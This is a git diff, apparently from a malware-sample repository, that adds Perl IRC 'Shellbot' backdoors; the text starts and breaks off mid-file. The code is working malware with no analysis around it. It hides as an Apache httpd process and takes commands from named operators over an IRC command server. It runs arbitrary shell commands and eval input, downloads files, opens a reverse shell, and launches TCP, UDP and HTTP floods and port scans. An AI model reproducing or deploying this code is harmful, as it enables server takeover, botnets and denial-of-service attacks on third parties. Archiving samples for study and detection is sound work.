($case =~ /^connect\s+(\S+)\s+(\S+)/) { + conectar("$2", "$1", 6667); + } + if ($case =~ /^raw (.*)/) { + sendraw("$1"); + } + if ($case =~ /^eval (.*)/) { + eval "$1"; + } +} + +sub shell { + my $printl=$_[0]; + my $comando=$_[1]; + if ($comando =~ /cd (.*)/) { + chdir("$1") || msg("$printl", "No such file or directory"); + return; + } + elsif ($pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`$comando 2>&1 3>&1`; + my $c=0; + foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } + } + exit; + } + } +} + +sub tcpflooder { + my $itime = time; + my ($cur_time); + my ($ia,$pa,$proto,$j,$l,$t); + $ia=inet_aton($_[0]); + $pa=sockaddr_in($_[1],$ia); + $ftime=$_[2]; + $proto=getprotobyname('tcp'); + $j=0;$l=0; + $cur_time = time - $itime; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + socket($t,PF_INET,SOCK_STREAM,$proto); + connect($t,$pa)||$j--; + $j++;$l++; + } + $l=0; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + shutdown($t,2); + $l++; + } +} + +sub udpflooder { + my $iaddr = inet_aton($_[0]); + my $msg = 'A' x $_[1]; + my $ftime = $_[2]; + my $cp = 0; + my (%pacotes); + $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; + + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; + return(undef) if $cp == 4; + my $itime = time; + my ($cur_time); + while ( 1 ) { + for (my $porta = 1; $porta <= 65000; $porta++) { + $cur_time = time - $itime; + last if $cur_time >= $ftime; + send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; + send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; + send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; + send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + for (my $pc = 3; $pc <= 255;$pc++) { + next if $pc == 6; + $cur_time = time - $itime; + last if $cur_time >= $ftime; + socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; + send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; + } + } + last if $cur_time >= $ftime; + } + return($cur_time, %pacotes); +} + +sub ctcp { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} +sub msg { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :$_[1]"); +} +sub notice { + return unless $#_ == 1; + sendraw("NOTICE $_[0] :$_[1]"); +} +sub op { + return unless $#_ == 1; + sendraw("MODE $_[0] +o $_[1]"); +} +sub deop { + return unless $#_ == 1; + sendraw("MODE $_[0] -o $_[1]"); +} +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw("JOIN $_[0]"); +} +sub p { part(@_); } +sub part { + sendraw("PART $_[0]"); +} +sub nick { + return unless $#_ == 0; + sendraw("NICK $_[0]"); +} +sub quit { + sendraw("QUIT :$_[0]"); +} + + + +sub fetch(){ + my $rnd=(int(rand(9999))); + my $n= 80; + if ($rnd<5000) { $n<<=1;} + my $s= (int(rand(10)) * $n); +{ +my @dominios = ("com","net","org","info","gov", "gob","gub","xxx","it","uk","wx", + +"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec", +"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al", + +"dk","pl","biz","int","pro","museum","coop", +"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba", + +"bw","bn","bg","bf","bi", +"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk", + + +"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn", + +"hk","hu","in","id","ir", +"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il", + +"jm","je","jo","kz","ke", +"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md", + +"mc","mn","ms","mz","mm", +"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn", + +"ws","as","sm","pm","vc", +"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr", + +"tm","tv","ug","ua","uz", +"vu","vn","ye","yu","cd","zm","zw",""); +my @str; + +foreach $dom (@dominios) +{ + push (@str,"@gstring"); +} + + my $query="http://buscador.terra.com.br/default.aspx?ca=s&source=Search&query="; + $query.=$str[(rand(scalar(@str)))]; + $query.="&num=$n&start=$s"; + my @lst=(); +#sendraw("privmsg #Atk33 :DEBUG only test googling: ".$query.""); + my $page = http_query($query); + while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){ +if ($1 !~ m/google|cache|translate/){ + push (@lst,$1); +} + } + return (@lst); +} + +sub http_query($){ + my ($url) = @_; + my $host=$url; + my $query=$url; + my $page=""; + $host =~ s/href=\"?http:\/\///; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $query =~s/$host//; + if ($query eq "") {$query="/";}; + eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); + }; + + return $page; +} +} + + +# NOTE: bY destructive +# pwnz0r! \ No newline at end of file diff --git a/Perl/Backdoor.Perl.Shellbot.aj b/Perl/Backdoor.Perl.Shellbot.aj new file mode 100644 index 00000000..afe3dd04 --- /dev/null +++ b/Perl/Backdoor.Perl.Shellbot.aj @@ -0,0 +1,989 @@ +my $processo = "/usr/local/apache/bin/httpd -UdghdfRL"; +if (`ps aux` =~ /httpd -UdghdfRL/){exit;} +$servidor='speed.sin-ip.es' unless $servidor; +my $porta='6667'; +my @canais=("#sni-labs"); +my @adms=("SPEED", "C4Sh", "ODLTEAM"); + +my $linas_max=10; +my $sleep=3; + +my $nick = getnick(); +my $ircname = getnick(); +my $realname = getnick(); + +my $acessoshell = 1; +######## Stealth ShellBot ########## +my $estatisticas = 0; +my $pacotes = 1; +#################################### + +my $VERSAO = '0.2a'; +my $version = "!sni"; + +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; + +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"; +my $pid=fork; +exit if $pid; +die "Problema com o fork: $!" unless defined($pid); + +my %irc_servers; +my %DCC; +my $dcc_sel = new IO::Select->new(); + +##################### +# Stealth Shellbot # +##################### + + + +sub getnick { +return "Rx".int(rand(100000)); +} + + +sub getident { + my $retornoident = &_get("http://www.minpop.com/sk12pack/idents.php"); + my $identchance = int(rand(100)); + if ($identchance > 30) { + return $nick; + } else { + return $retornoident; + } + return $retornoident; +} + +sub getname { + my $retornoname = &_get("http://www.minpop.com/sk12pack/names.php"); + return $retornoname; +} + +# IDENT TEMPORARIA - Pegar ident da url ta bugando o_o +sub getident2 { + my $length=shift; + $length = 3 if ($length < 3); + + my @chars=('a'..'z','A'..'Z','1'..'9'); + foreach (1..$length) + { + $randomstring.=$chars[rand @chars]; + } + return $randomstring; +} + +sub getstore ($$) +{ + my $url = shift; + my $file = shift; + + $http_stream_out = 1; + open(GET_OUTFILE, "> $file"); + %http_loop_check = (); + _get($url); + close GET_OUTFILE; + return $main::http_get_result; +} + +sub _get +{ + my $url = shift; + my $proxy = ""; + grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV; + if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) { + my $host = $1; + my $port = $2 || 80; + my $path = $3; + $path = "/" unless defined($path); + return _trivial_http_get($host, $port, $path); + } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) { + my $host = $1; + my $port = $2; + my $path = $url; + return _trivial_http_get($host, $port, $path); + } else { + return undef; + } +} + + +sub _trivial_http_get +{ + my($host, $port, $path) = @_; + my($AGENT, $VERSION, $p); + #print "HOST=$host, PORT=$port, PATH=$path\n"; + + $AGENT = "get-minimal"; + $VERSION = "20000118"; + + $path =~ s/ /%20/g; + + require IO::Socket; + local($^W) = 0; + my $sock = IO::Socket::INET->new(PeerAddr => $host, + PeerPort => $port, + Proto => 'tcp', + Timeout => 60) || return; + $sock->autoflush; + my $netloc = $host; + $netloc .= ":$port" if $port != 80; + my $request = "GET $path HTTP/1.0\015\012" + . "Host: $netloc\015\012" + . "User-Agent: $AGENT/$VERSION/u\015\012"; + $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache); + $request .= "\015\012"; + print $sock $request; + + my $buf = ""; + my $n; + my $b1 = ""; + while ($n = sysread($sock, $buf, 8*1024, length($buf))) { + if ($b1 eq "") { # first block? + $b1 = $buf; # Save this for errorcode parsing + $buf =~ s/.+?\015?\012\015?\012//s; # zap header + } + if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; } + } + return undef unless defined($n); + + $main::http_get_result = 200; + if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) { + $main::http_get_result = $1; + # print "CODE=$main::http_get_result\n$b1\n"; + if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/ +) { + # redirect + my $url = $1; + return undef if $http_loop_check{$url}++; + return _get($url); + } + return undef unless $main::http_get_result =~ /^2/; + } + + return $buf; +} + +############################# +# B0tchZ na veia ehehe :P # +############################# + +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 2; + } + +} +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + &DCC::connections; + my @ready = $sel_cliente->can_read(0.6); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + + for(my $c=0; $c<= $#lines; $c++) { + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); + } + elsif ($args =~ /^\001PING\s+(\d+)\001$/) { + notice("$pn", "\001PONG\001"); + } + elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + elsif ($args =~ /^(\Q$meunick\E|\Q$version\E)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "$version" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } + } + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + } + } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { + $meunick = getnick(); + nick("$meunick"); + } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + $meunick = $2; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; + foreach my $canal (@canais) { + sendraw("JOIN $canal"); + } + } +} + +sub bfunc { + my $printl = $_[0]; + my $funcarg = $_[1]; + if (my $pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my @portas=("21","22","23","25","53","80","110","143"); + my (@aberta, %porta_banner); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @aberta"); + } else { + sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada."); + } + } + + elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) { + getstore("$1", "$2"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :Download de $2 ($1) Concluэdo!") if ($estatisticas); + } + + elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) { + my $hostname="$1"; + my $portainicial = "$2"; + my $portafinal = "$3"; + my (@abertas, %porta_banner); + foreach my $porta ($portainicial..$portafinal) + { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => 4); + if ($scansock) { + push (@abertas, $porta); + $scansock->close; + if ($estatisticas) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :Porta $porta aberta em $hostname"); + } + } + } + if (@abertas) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @abertas"); + } else { + sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada."); + } + } + + elsif ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP-DDOS]\002 Attacking ".$1.":80 for ".$2." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($2>$cur_time){ + $cur_time = time - $itime; + my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); + print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; + close($socket); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP-DDOS]\002 Finished with attacking ".$1."."); + } + + # Duas Versїes simplificada do meu Tr0x ;D + elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) { + return unless $pacotes; + socket(Tr0x, PF_INET, SOCK_DGRAM, 17); + my $alvo=inet_aton("$1"); + my $porta = "$2"; + my $tempo = "$3"; + my $pacote; + my $pacotese; + my $fim = time + $tempo; + my $pacota = 1; + while (($pacota == "1") && ($pacotes == "1")) { + $pacota = 0 if ((time >= $fim) && ($tempo != "0")); + $pacote=$rand x $rand x $rand; + $porta = int(rand 65000) +1 if ($porta == "0"); + send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1"); + } + if ($estatisticas) + { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $1"); + } + } + + elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) { + return unless $pacotes; + socket(Tr0x, PF_INET, SOCK_DGRAM, 17); + my $faixaip="$1"; + my $porta = "$2"; + my $tempo = "$3"; + my $pacote; + my $pacotes; + my $fim = time + $tempo; + my $pacota = 1; + my $alvo; + while ($pacota == "1") { + $pacota = 0 if ((time >= $fim) && ($tempo != "0")); + for (my $faixa = 1; $faixa <= 255; $faixa++) { + $alvo = inet_aton("$faixaip.$faixa"); + $pacote=$rand x $rand x $rand; + $porta = int(rand 65000) +1 if ($porta == "0"); + send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1"); + if ($faixa >= 255) { + $faixa = 1; + } + } + } + if ($estatisticas) + { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $alvo"); + } + } + + # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p + elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { + my $host = "$1"; + my $porta = "$2"; + my $proto = getprotobyname('tcp'); + my $iaddr = inet_aton($host); + my $paddr = sockaddr_in($porta, $iaddr); + my $shell = "/bin/sh -i"; + if ($^O eq "MSWin32") { + $shell = "cmd.exe"; + } + socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; + connect(SOCKET, $paddr) or die "connect: $!"; + open(STDIN, ">&SOCKET"); + open(STDOUT, ">&SOCKET"); + open(STDERR, ">&SOCKET"); + system("$shell"); + close(STDIN); + close(STDOUT); + close(STDERR); + + if ($estatisticas) + { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Conectando-se em\002: $host:$porta"); + } + } + + elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) { + return unless $pacotes; + my ($dtime, %pacotes) = attacker("$1", "$2", "$3"); + $dtime = 1 if $dtime == 0; + my %bytes; + $bytes{igmp} = $2 * $pacotes{igmp}; + $bytes{icmp} = $2 * $pacotes{icmp}; + $bytes{o} = $2 * $pacotes{o}; + $bytes{udp} = $2 * $pacotes{udp}; + $bytes{tcp} = $2 * $pacotes{tcp}; + unless ($estatisticas) + { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o})); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o})); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Mщdia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps"); + } + } + exit; + } + } +} + +sub ircase { + my ($kem, $printl, $case) = @_; + + if ($case =~ /^join (.*)/) { + j("$1"); + } + elsif ($case =~ /^part (.*)/) { + p("$1"); + } + elsif ($case =~ /^rejoin\s+(.*)/) { + my $chan = $1; + if ($chan =~ /^(\d+) (.*)/) { + for (my $ca = 1; $ca <= $1; $ca++ ) { + p("$2"); + j("$2"); + } + } else { + p("$chan"); + j("$chan"); + } + } + elsif ($case =~ /^op/) { + op("$printl", "$kem") if $case eq "op"; + my $oarg = substr($case, 3); + op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + + elsif ($case =~ /^root/) + { + if(rooting($printl)) + { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Rooting]\002 Nothing rootable!!"); + } + } + elsif ($case =~ /^deop/) { + deop("$printl", "$kem") if $case eq "deop"; + my $oarg = substr($case, 5); + deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + elsif ($case =~ /^voice/) { + voice("$printl", "$kem") if $case eq "voice"; + $oarg = substr($case, 6); + voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + elsif ($case =~ /^devoice/) { + devoice("$printl", "$kem") if $case eq "devoice"; + $oarg = substr($case, 8); + devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + elsif ($case =~ /^msg\s+(\S+) (.*)/) { + msg("$1", "$2"); + } + elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + msg("$2", "$3"); + } + } + elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + ctcp("$2", "$3"); + } + } + elsif ($case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp("$1", "$2"); + } + elsif ($case =~ /^invite\s+(\S+) (.*)/) { + invite("$1", "$2"); + } + elsif ($case =~ /^nick (.*)/) { + nick("$1"); + } + elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) { + conectar("$2", "$1", 6667); + } + elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) { + DCC::SEND("$1", "$2"); + } + elsif ($case =~ /^raw (.*)/) { + sendraw("$1"); + } + elsif ($case =~ /^eval (.*)/) { + eval "$1"; + } + elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) { + sleep int(rand($2)); + j("$1"); + } + elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) { + sleep int(rand($2)); + p("$1"); + } + elsif ($case =~ /^sair/) { + quit(); + } + elsif ($case =~ /^novonick/) { + my $novonick = getnick(); + nick("$novonick"); + } + elsif ($case =~ /^estatisticas (.*)/) { + if ($1 eq "on") { + $estatisticas = 1; + msg("$printl", "Estatэsticas ativadas!"); + } elsif ($1 eq "off") { + $estatisticas = 0; + msg("$printl", "Estatэsticas desativadas!"); + } + } + elsif ($case =~ /^pacotes (.*)/) { + if ($1 eq "on") { + $pacotes = 1; + msg("$printl", "Pacotes ativados!") if ($estatisticas == "1"); + } elsif ($1 eq "off") { + $pacotes = 0; + msg("$printl", "Pacotes desativados!") if ($estatisticas == "1"); + } + } +} +sub rooting { + + my $printl=$_[0]; + my $kern=`uname -a`; + if ($kern =~ /2.4.17\s/ || $kern =~ /2.4.18\s/ || $kern =~ /2.4.19\s/ || $kern =~ /2.4.20/ || $kern =~ /2.4.20-8/ || $kern =~ /2.4.21\s/ || $kern =~ /2.4.22\s/ || $kern =~ /2.4.22-10\s/ || $kern =~ /2.4.23\s/ || $kern =~ /2.4.24\s/ || $kern =~ /2.4.25-1\s/ || $kern =~ /2.4.26\s/ || $kern =~ /2.4.27\s/ || $kern =~ /2.6.2\s/ || $kern =~ /2.6.5\s/ || $kern =~ /2.6.6\s/ || $kern =~ /2.6.7\s/ || $kern =~ /2.6.8\s/ || $kern =~ /2.6.8-5\s/ || $kern =~ /2.6.9\s/ || $kern =~ /2.6.9-34\s/ || $kern =~ /2.6.10\s/ || $kern =~ /2.6.11/ || $kern =~ /2.6.13\s/ || $kern =~ /2.6.13-17/ || $kern =~ /2.6.14\s/ || $kern =~ /2.6.15\s/ || $kern =~ /2.6.16\s/) + { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Exploitable Kernel !!]\003\002 Im exploitable Kernel: ".`uname -r`); + } + else + { + return 1; + } +return 0; +} + +sub shell { + return unless $acessoshell; + my $printl=$_[0]; + my $comando=$_[1]; + if ($comando =~ /cd (.*)/) { + chdir("$1") || msg("$printl", "Diretєrio inexistente!"); + return; + } + elsif ($pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`$comando 2>&1 3>&1`; + my $c=0; + foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c >= "$linas_max") { + $c=0; + sleep $sleep; + } + } + exit; + } + } +} + +#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki +sub attacker { + my $iaddr = inet_aton($_[0]); + my $msg = 'B' x $_[1]; + my $ftime = $_[2]; + my $cp = 0; + my (%pacotes); + $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; + return(undef) if $cp == 4; + my $itime = time; + my ($cur_time); + while ( 1 ) { + for (my $porta = 1; $porta <= 65535; $porta++) { + $cur_time = time - $itime; + last if $cur_time >= $ftime; + send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1); + send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1); + send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1); + send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1); + + # DoS ?? :P + for (my $pc = 3; $pc <= 255;$pc++) { + next if $pc == 6; + $cur_time = time - $itime; + last if $cur_time >= $ftime; + socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; + send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1); + } + } + last if $cur_time >= $ftime; + } + return($cur_time, %pacotes); +} + +############# +# ALIASES # +############# + +sub action { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001"); +} + +sub ctcp { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} +sub msg { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :$_[1]"); +} + +sub notice { + return unless $#_ == 1; + sendraw("NOTICE $_[0] :$_[1]"); +} + +sub op { + return unless $#_ == 1; + sendraw("MODE $_[0] +o $_[1]"); +} +sub deop { + return unless $#_ == 1; + sendraw("MODE $_[0] -o $_[1]"); +} +sub hop { + return unless $#_ == 1; + sendraw("MODE $_[0] +h $_[1]"); +} +sub dehop { + return unless $#_ == 1; + sendraw("MODE $_[0] +h $_[1]"); +} +sub voice { + return unless $#_ == 1; + sendraw("MODE $_[0] +v $_[1]"); +} +sub devoice { + return unless $#_ == 1; + sendraw("MODE $_[0] -v $_[1]"); +} +sub ban { + return unless $#_ == 1; + sendraw("MODE $_[0] +b $_[1]"); +} +sub unban { + return unless $#_ == 1; + sendraw("MODE $_[0] -b $_[1]"); +} +sub kick { + return unless $#_ == 1; + sendraw("KICK $_[0] $_[1] :$_[2]"); +} + +sub modo { + return unless $#_ == 0; + sendraw("MODE $_[0] $_[1]"); +} +sub mode { modo(@_); } + +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw("JOIN $_[0]"); +} +sub p { part(@_); } +sub part {sendraw("PART $_[0]");} + +sub nick { + return unless $#_ == 0; + sendraw("NICK $_[0]"); +} + +sub invite { + return unless $#_ == 1; + sendraw("INVITE $_[1] $_[0]"); +} +sub topico { + return unless $#_ == 1; + sendraw("TOPIC $_[0] $_[1]"); +} +sub topic { topico(@_); } + +sub whois { + return unless $#_ == 0; + sendraw("WHOIS $_[0]"); +} +sub who { + return unless $#_ == 0; + sendraw("WHO $_[0]"); +} +sub names { + return unless $#_ == 0; + sendraw("NAMES $_[0]"); +} +sub away { + sendraw("AWAY $_[0]"); +} +sub back { away(); } +sub quit { + sendraw("QUIT :$_[0]"); + exit; +} + +# DCC +package DCC; + +sub connections { + my @ready = $dcc_sel->can_read(1); +# return unless (@ready); + foreach my $fh (@ready) { + my $dcctipo = $DCC{$fh}{tipo}; + my $arquivo = $DCC{$fh}{arquivo}; + my $bytes = $DCC{$fh}{bytes}; + my $cur_byte = 